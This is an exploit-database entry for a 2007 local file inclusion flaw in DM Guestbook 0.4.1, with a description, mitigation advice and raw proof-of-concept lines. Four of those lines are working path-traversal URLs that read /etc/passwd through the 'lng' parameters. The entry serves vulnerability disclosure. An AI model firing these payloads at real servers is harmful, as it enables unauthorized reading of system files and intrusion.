header-logo
Suggest Exploit
vendor:
DM Guestbook
by:
milw0rm.com
6.4
CVSS
MEDIUM
Local File Include
22
CWE
Product Name: DM Guestbook
Affected Version From: 2000.4.1
Affected Version To: 2000.4.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities

The DM Guestbook version 0.4.1 is vulnerable to multiple local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by including arbitrary files from the system, such as /etc/passwd, by manipulating the 'lng' parameter in various PHP scripts. This allows an attacker to view sensitive information and potentially gain unauthorized access to the system.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to a patched version of DM Guestbook or apply relevant security patches provided by the vendor. Additionally, it is advised to restrict access to the affected scripts or implement proper input validation and sanitization to prevent arbitrary file inclusion attacks.
Source

Exploit-DB raw data:

#  DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities
#  http://sourceforge.net/project/showfiles.php?group_id=101364 /guestbook.0.4.1/
#  POC :
#  /guestbook.php?lng=../../../../../../../etc/passwd%00
#  /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
#  /auto/glob_new.php?lng=../../../../../../../etc/passwd%00
#  /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00

# milw0rm.com [2007-11-02]

Navigation

Suggest Exploit

Services By CQR